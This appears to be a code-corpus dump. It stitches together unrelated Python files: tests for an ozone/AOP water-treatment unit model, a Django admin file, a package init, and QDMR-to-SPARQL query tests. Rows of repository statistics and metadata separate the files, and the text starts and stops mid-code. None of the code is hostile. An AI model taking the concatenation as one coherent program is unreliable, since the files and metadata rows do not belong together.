m.fs.unit = OzoneAOPZO(
default={"property_package": m.fs.params, "database": m.db}
)
m.fs.unit.inlet.flow_mass_comp[0, "H2O"].fix(100)
m.fs.unit.inlet.flow_mass_comp[0, "cryptosporidium"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "toc"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "giardia_lamblia"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "eeq"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "total_coliforms_fecal_ecoli"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "viruses_enteric"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "tss"].fix(1)
return m
@pytest.mark.unit
def test_toc_in_solute_list(self):
model = ConcreteModel()
model.db = Database()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.params = WaterParameterBlock(
default={"solute_list": ["cryptosporidium", "giardia_lamblia", "eeq"]}
)
with pytest.raises(
ConfigurationError,
match="TOC must be in solute list for Ozonation or Ozone/AOP",
):
model.fs.unit = OzoneAOPZO(
default={"property_package": model.fs.params, "database": model.db}
)
@pytest.mark.unit
def test_build(self, model):
assert model.fs.unit.config.database is model.db
assert model.fs.unit._tech_type == "ozone_aop"
assert isinstance(model.fs.unit.contact_time, Var)
assert isinstance(model.fs.unit.concentration_time, Var)
assert isinstance(model.fs.unit.mass_transfer_efficiency, Var)
assert isinstance(model.fs.unit.ozone_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_consumption, Var)
assert isinstance(model.fs.unit.electricity, Var)
assert isinstance(model.fs.unit.specific_energy_coeff, Var)
assert isinstance(model.fs.unit.oxidant_dose, Var)
assert isinstance(model.fs.unit.chemical_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_toc_ratio, Var)
assert isinstance(model.fs.unit.oxidant_ozone_ratio, Var)
assert isinstance(model.fs.unit.ozone_consumption_constraint, Constraint)
assert isinstance(model.fs.unit.ozone_flow_mass_constraint, Constraint)
assert isinstance(model.fs.unit.electricity_constraint, Constraint)
assert isinstance(model.fs.unit.chemical_flow_mass_constraint, Constraint)
@pytest.mark.component
def test_load_parameters(self, model):
data = model.db.get_unit_operation_parameters("ozone_aop")
model.fs.unit.load_parameters_from_database(use_default_removal=True)
assert model.fs.unit.recovery_frac_mass_H2O[0].fixed
assert model.fs.unit.recovery_frac_mass_H2O[0].value == 1
for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():
assert v.fixed
if j not in data["removal_frac_mass_solute"]:
assert v.value == data["default_removal_frac_mass_solute"]["value"]
else:
assert v.value == data["removal_frac_mass_solute"][j]["value"]
assert model.fs.unit.contact_time[0].fixed
assert model.fs.unit.contact_time[0].value == data["contact_time"]["value"]
assert model.fs.unit.concentration_time[0].fixed
assert (
model.fs.unit.concentration_time[0].value
== data["concentration_time"]["value"]
)
assert model.fs.unit.mass_transfer_efficiency[0].fixed
assert (
model.fs.unit.mass_transfer_efficiency[0].value
== data["mass_transfer_efficiency"]["value"]
)
assert model.fs.unit.specific_energy_coeff[0].fixed
assert (
model.fs.unit.specific_energy_coeff[0].value
== data["specific_energy_coeff"]["value"]
)
assert (
model.fs.unit.oxidant_ozone_ratio[0].value
== data["oxidant_ozone_ratio"]["value"]
)
@pytest.mark.component
def test_degrees_of_freedom(self, model):
assert degrees_of_freedom(model.fs.unit) == 0
@pytest.mark.component
def test_unit_consistency(self, model):
assert_units_consistent(model.fs.unit)
@pytest.mark.component
def test_initialize(self, model):
initialization_tester(model)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solve(self, model):
results = solver.solve(model)
# Check for optimal solution
assert check_optimal_termination(results)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solution(self, model):
assert pytest.approx(0.102089, rel=1e-5) == value(
model.fs.unit.properties_treated[0].flow_vol
)
assert pytest.approx(2.661333, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["toc"]
)
assert pytest.approx(9.795299, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["tss"]
)
assert pytest.approx(0.103497, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["eeq"]
)
assert pytest.approx(9921.863324, rel=1e-5) == value(
model.fs.unit.ozone_flow_mass[0]
)
assert pytest.approx(49609.316620, rel=1e-5) == value(
model.fs.unit.electricity[0]
)
assert pytest.approx(0.50005, rel=1e-5) == value(
model.fs.unit.chemical_flow_mass[0]
)
@pytest.mark.component
def test_report(self, model):
model.fs.unit.report()
class TestOzoneAOPZO_w_o_default_removal:
@pytest.fixture(scope="class")
def model(self):
m = ConcreteModel()
m.db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = WaterParameterBlock(
default={
"solute_list": [
"cryptosporidium",
"toc",
"giardia_lamblia",
"eeq",
"total_coliforms_fecal_ecoli",
"viruses_enteric",
]
}
)
m.fs.unit = OzoneAOPZO(
default={"property_package": m.fs.params, "database": m.db}
)
m.fs.unit.inlet.flow_mass_comp[0, "H2O"].fix(100)
m.fs.unit.inlet.flow_mass_comp[0, "cryptosporidium"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "toc"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "giardia_lamblia"].fix(2)
m.fs.unit.inlet.flow_mass_comp[0, "eeq"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "total_coliforms_fecal_ecoli"].fix(1)
m.fs.unit.inlet.flow_mass_comp[0, "viruses_enteric"].fix(1)
return m
def test_toc_in_solute_list(self):
model = ConcreteModel()
model.db = Database()
model.fs = FlowsheetBlock(default={"dynamic": False})
model.fs.params = WaterParameterBlock(
default={"solute_list": ["cryptosporidium", "viruses_enteric"]}
)
with pytest.raises(
ConfigurationError,
match="TOC must be in solute list for Ozonation or Ozone/AOP",
):
model.fs.unit = OzoneAOPZO(
default={"property_package": model.fs.params, "database": model.db}
)
@pytest.mark.unit
def test_build(self, model):
assert model.fs.unit.config.database is model.db
assert model.fs.unit._tech_type == "ozone_aop"
assert isinstance(model.fs.unit.contact_time, Var)
assert isinstance(model.fs.unit.concentration_time, Var)
assert isinstance(model.fs.unit.mass_transfer_efficiency, Var)
assert isinstance(model.fs.unit.ozone_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_consumption, Var)
assert isinstance(model.fs.unit.electricity, Var)
assert isinstance(model.fs.unit.specific_energy_coeff, Var)
assert isinstance(model.fs.unit.oxidant_dose, Var)
assert isinstance(model.fs.unit.chemical_flow_mass, Var)
assert isinstance(model.fs.unit.ozone_toc_ratio, Var)
assert isinstance(model.fs.unit.oxidant_ozone_ratio, Var)
assert isinstance(model.fs.unit.ozone_consumption_constraint, Constraint)
assert isinstance(model.fs.unit.ozone_flow_mass_constraint, Constraint)
assert isinstance(model.fs.unit.electricity_constraint, Constraint)
assert isinstance(model.fs.unit.chemical_flow_mass_constraint, Constraint)
@pytest.mark.component
def test_load_parameters(self, model):
data = model.db.get_unit_operation_parameters("ozone_aop")
model.fs.unit.load_parameters_from_database()
assert model.fs.unit.recovery_frac_mass_H2O[0].fixed
assert model.fs.unit.recovery_frac_mass_H2O[0].value == 1
for (t, j), v in model.fs.unit.removal_frac_mass_solute.items():
assert v.fixed
if j not in data["removal_frac_mass_solute"]:
assert v.value == data["default_removal_frac_mass_solute"]["value"]
else:
assert v.value == data["removal_frac_mass_solute"][j]["value"]
assert model.fs.unit.contact_time[0].fixed
assert model.fs.unit.contact_time[0].value == data["contact_time"]["value"]
assert model.fs.unit.concentration_time[0].fixed
assert (
model.fs.unit.concentration_time[0].value
== data["concentration_time"]["value"]
)
assert model.fs.unit.mass_transfer_efficiency[0].fixed
assert (
model.fs.unit.mass_transfer_efficiency[0].value
== data["mass_transfer_efficiency"]["value"]
)
assert model.fs.unit.specific_energy_coeff[0].fixed
assert (
model.fs.unit.specific_energy_coeff[0].value
== data["specific_energy_coeff"]["value"]
)
assert (
model.fs.unit.oxidant_ozone_ratio[0].value
== data["oxidant_ozone_ratio"]["value"]
)
@pytest.mark.component
def test_degrees_of_freedom(self, model):
assert degrees_of_freedom(model.fs.unit) == 0
@pytest.mark.component
def test_unit_consistency(self, model):
assert_units_consistent(model.fs.unit)
@pytest.mark.component
def test_initialize(self, model):
initialization_tester(model)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solve(self, model):
results = solver.solve(model)
# Check for optimal solution
assert check_optimal_termination(results)
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solution(self, model):
assert pytest.approx(0.101186, rel=1e-5) == value(
model.fs.unit.properties_treated[0].flow_vol
)
assert pytest.approx(2.685090, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["toc"]
)
assert pytest.approx(1.912526, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["giardia_lamblia"]
)
assert pytest.approx(0.104420, rel=1e-5) == value(
model.fs.unit.properties_treated[0].conc_mass_comp["eeq"]
)
assert pytest.approx(9921.863324, rel=1e-5) == value(
model.fs.unit.ozone_flow_mass[0]
)
assert pytest.approx(49609.316620, rel=1e-5) == value(
model.fs.unit.electricity[0]
)
assert pytest.approx(0.50005, rel=1e-5) == value(
model.fs.unit.chemical_flow_mass[0]
)
@pytest.mark.component
def test_report(self, model):
model.fs.unit.report()
def test_costing():
m = ConcreteModel()
m.db = Database()
m.fs = FlowsheetBlock(default={"dynamic": False})
m.fs.params = WaterParameterBlock(
default={"solute_list": ["viruses_enteric", "toc", "cryptosporidium"]}
)
m.fs.costing = ZeroOrderCosting()
m.fs.unit1 = OzoneAOPZO(default={"property_package": m.fs.params, "database": m.db})
m.fs.unit1.inlet.flow_mass_comp[0, "H2O"].fix(10000)
m.fs.unit1.inlet.flow_mass_comp[0, "viruses_enteric"].fix(1)
m.fs.unit1.inlet.flow_mass_comp[0, "toc"].fix(2)
m.fs.unit1.inlet.flow_mass_comp[0, "cryptosporidium"].fix(3)
m.fs.unit1.load_parameters_from_database(use_default_removal=True)
assert degrees_of_freedom(m.fs.unit1) == 0
m.fs.unit1.costing = UnitModelCostingBlock(
default={"flowsheet_costing_block": m.fs.costing}
)
assert isinstance(m.fs.unit1.chemical_flow_mass, Var)
assert isinstance(m.fs.costing.ozone_aop, Block)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_a_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_b_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_c_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.ozone_capital_d_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.aop_capital_a_parameter, Var)
assert isinstance(m.fs.costing.ozone_aop.aop_capital_b_parameter, Var)
assert isinstance(m.fs.unit1.costing.capital_cost, Var)
assert isinstance(m.fs.unit1.costing.capital_cost_constraint, Constraint)
assert_units_consistent(m.fs)
assert degrees_of_freedom(m.fs.unit1) == 0
assert m.fs.unit1.electricity[0] in m.fs.costing._registered_flows["electricity"]
assert str(m.fs.costing._registered_flows["hydrogen_peroxide"][0]) == str(
m.fs.unit1.chemical_flow_mass[0]
)
| 38.987805 | 88 | 0.649296 | 2,021 | 15,985 | 4.948046 | 0.115289 | 0.0594 | 0.0902 | 0.069 | 0.847 | 0.834 | 0.8292 | 0.8262 | 0.8078 | 0.7875 | 0 | 0.020535 | 0.226212 | 15,985 | 409 | 89 | 39.08313 | 0.787938 | 0.038911 | 0 | 0.691617 | 0 | 0 | 0.091993 | 0.025089 | 0 | 0 | 0 | 0 | 0.293413 | 1 | 0.062874 | false | 0 | 0.038922 | 0 | 0.113772 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c1e089c1185d554a6671790699a986d06f5c096 | 108 | py | Python | hollow/iga/__init__.py | otherlab/hollow | 9f8209464969dfd449c791c93978292998d5c4e7 | [
"BSD-2-Clause"
] | 5 | 2016-05-09T17:49:28.000Z | 2021-04-18T22:22:05.000Z | hollow/iga/__init__.py | otherlab/hollow | 9f8209464969dfd449c791c93978292998d5c4e7 | [
"BSD-2-Clause"
] | null | null | null | hollow/iga/__init__.py | otherlab/hollow | 9f8209464969dfd449c791c93978292998d5c4e7 | [
"BSD-2-Clause"
] | 1 | 2020-05-20T06:16:51.000Z | 2020-05-20T06:16:51.000Z | from __future__ import division,print_function,unicode_literals,absolute_import
from .. import hollow_wrap
| 27 | 79 | 0.87037 | 14 | 108 | 6.142857 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 108 | 3 | 80 | 36 | 0.868687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
9c749e7b329ef210d565f0087765c0b3b3612086 | 141 | py | Python | graph/admin.py | Unicorn-Dev/ProGraph | 4ec7a2c09b243562d5eb5f7cfeace0887fd162af | [
"MIT"
] | null | null | null | graph/admin.py | Unicorn-Dev/ProGraph | 4ec7a2c09b243562d5eb5f7cfeace0887fd162af | [
"MIT"
] | null | null | null | graph/admin.py | Unicorn-Dev/ProGraph | 4ec7a2c09b243562d5eb5f7cfeace0887fd162af | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Graph
from .models import Image
admin.site.register(Graph)
admin.site.register(Image)
| 17.625 | 32 | 0.808511 | 21 | 141 | 5.428571 | 0.47619 | 0.175439 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113475 | 141 | 7 | 33 | 20.142857 | 0.912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13329a9f916f5cefe66cc5ac5d95625515e3a93b | 230,435 | py | Python | qdmr2sparql/test_qdmr2sparql.py | guoyi118/sparqling-queries | 8c9b9f517d6e05ac465a84df79f40484bc852c26 | [
"MIT"
] | 21 | 2021-09-14T11:33:05.000Z | 2022-03-29T13:22:19.000Z | qdmr2sparql/test_qdmr2sparql.py | guoyi118/sparqling-queries | 8c9b9f517d6e05ac465a84df79f40484bc852c26 | [
"MIT"
] | 1 | 2022-02-14T21:13:15.000Z | 2022-02-18T20:23:36.000Z | qdmr2sparql/test_qdmr2sparql.py | guoyi118/sparqling-queries | 8c9b9f517d6e05ac465a84df79f40484bc852c26 | [
"MIT"
] | 5 | 2021-09-20T08:54:55.000Z | 2022-02-10T00:59:54.000Z | import os
import ast
import unittest
import time
import attr
from timeout_decorator import timeout
import textwrap
from functools import lru_cache
from qdmr2sparql.datasets import QdmrInstance, DatasetBreak, DatasetSpider
from qdmr2sparql.structures import GroundingIndex, GroundingKey, RdfGraph
from qdmr2sparql.structures import QueryResult, QueryToRdf, OutputColumnId
from qdmr2sparql.query_generator import create_sparql_query_from_qdmr
ONE_TEST_TIMEOUT = 120
VIRTUOSO_SPARQL_SERVICE = None
class TestSelect(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_table(self):
"""When selecting full table we return the set or primary keys
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer
WHERE
{
?singer arc:singer:Singer_ID ?singer.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("singer"), schema)])
qdmr = QdmrInstance(["select"], [["singers"]])
grounding = {GroundingIndex(0,0,"singers") : GroundingKey.make_table_grounding("singer")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column(self):
"""When selecting the column we return the items of that column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select"], [["name"]])
grounding = {GroundingIndex(0,0,"name") : GroundingKey.make_column_grounding("singer", "Name")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_value(self):
"""When selecting the value we return all etries of that value in that column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_value_grounding("singer", "Country", "France"))])
qdmr = QdmrInstance(["select"], [["France"]])
grounding = {GroundingIndex(0,0,"France") : GroundingKey.make_value_grounding("singer", "Country", "France")}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSelectProject(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_table_project_column(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?countries
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))])
qdmr = QdmrInstance(["select", "project"], [["singers"], ["countries", "#1"]])
grounding = { GroundingIndex(0,0,"singers") : GroundingKey.make_table_grounding("singer"),
GroundingIndex(1,0,"countries") : GroundingKey.make_column_grounding("singer", "Country")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_table(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?singer
WHERE
{
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("singer"), schema)])
qdmr = QdmrInstance(["select", "project"], [["countries"], ["singers", "#1"]])
grounding = { GroundingIndex(0,0,"countries") : GroundingKey.make_column_grounding("singer", "Country"),
GroundingIndex(1,0,"singers") : GroundingKey.make_table_grounding("singer")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_project_value(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?countries
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_value_grounding("singer", "Country", "France"))])
qdmr = QdmrInstance(["select", "project"], [["names"], ["France", "#1"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,0,"France") : GroundingKey.make_value_grounding("singer", "Country", "France"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_value_project_column(self):
"""Select table, project column should return the column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "project"], [["France"], ["names", "#1"]])
grounding = { GroundingIndex(0,0,"France") : GroundingKey.make_value_grounding("singer", "Country", "France"),
GroundingIndex(1,0,"names") : GroundingKey.make_column_grounding("singer", "Name")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestDifferentColumnOrder(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_project_column_order(self):
"""
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name ?countries
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name")),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Country"))
])
qdmr = QdmrInstance(["select", "project", "union"], [["names"], ["Country", "#1"], ["#2", "#1"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,0,"Country") : GroundingKey.make_column_grounding("singer", "Country"),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=False,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSelectFilter(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_filter_value(self):
"""Select table, filter values based on a value in another column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Country ?countries.
FILTER(?countries = "France"^^xsd:string)
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter"], [["names"], ["#1", "France"]])
grounding = { GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,1,"France") : GroundingKey.make_value_grounding("singer", "Country", "France")
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_filter_with_comparative(self):
"""Select table, filter values based on a value in another column
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name
WHERE
{
?singer arc:singer:Name ?Name.
?singer arc:singer:Age ?Age.
FILTER(?Age > 32).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("singer", "Name"))])
qdmr = QdmrInstance(["select", "filter"], [["names"], ["#1", "older than 32"]])
grounding = {GroundingIndex(0,0,"names") : GroundingKey.make_column_grounding("singer", "Name"),
GroundingIndex(1,1,"older than 32"): GroundingKey.make_comparative_grounding(">", "32", GroundingKey.make_column_grounding("singer", "Age")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_filter_with_value_in_another_column(self):
"""Select table, filter values based on a value in another column.
The argument of comparative contains reference to a new column.
"""
rdf_graph, schema = get_graph_and_schema("dev", "car_1")
correct_sparql_query = textwrap.dedent("""\
SELECT ?ID
WHERE
{
?ID arc:cars_data:Weight ?Weight.
?ID arc:cars_data:Year ?Year.
FILTER(?Year > ?Weight).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema)])
qdmr = QdmrInstance(["select", "project", "filter"], [["cars"], ["weights", "#1"], ["#1", "years larger than #2"]])
grounding = {
GroundingIndex(0,0,"cars") : GroundingKey.make_table_grounding("cars_data"),
GroundingIndex(1,0,"weights") : GroundingKey.make_column_grounding("cars_data", "Weight"),
GroundingIndex(2,1,"years larger than #2"): GroundingKey.make_comparative_grounding(">", "#2", GroundingKey.make_column_grounding("cars_data", "Year")),
}
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_select_column_filter_superlative(self):
"""Select table, filter values based on a value in another column - with superlative
"""
rdf_graph, schema = get_graph_and_schema("dev", "concert_singer")
correct_sparql_query = textwrap.dedent("""\
SELECT ?Name_1
WHERE
{
{
SELECT (min(?Age) AS ?min)
WHERE
{
?singer arc:singer:Age ?Age.
}
}
?singer_1 arc:singer:Age ?Age_1.
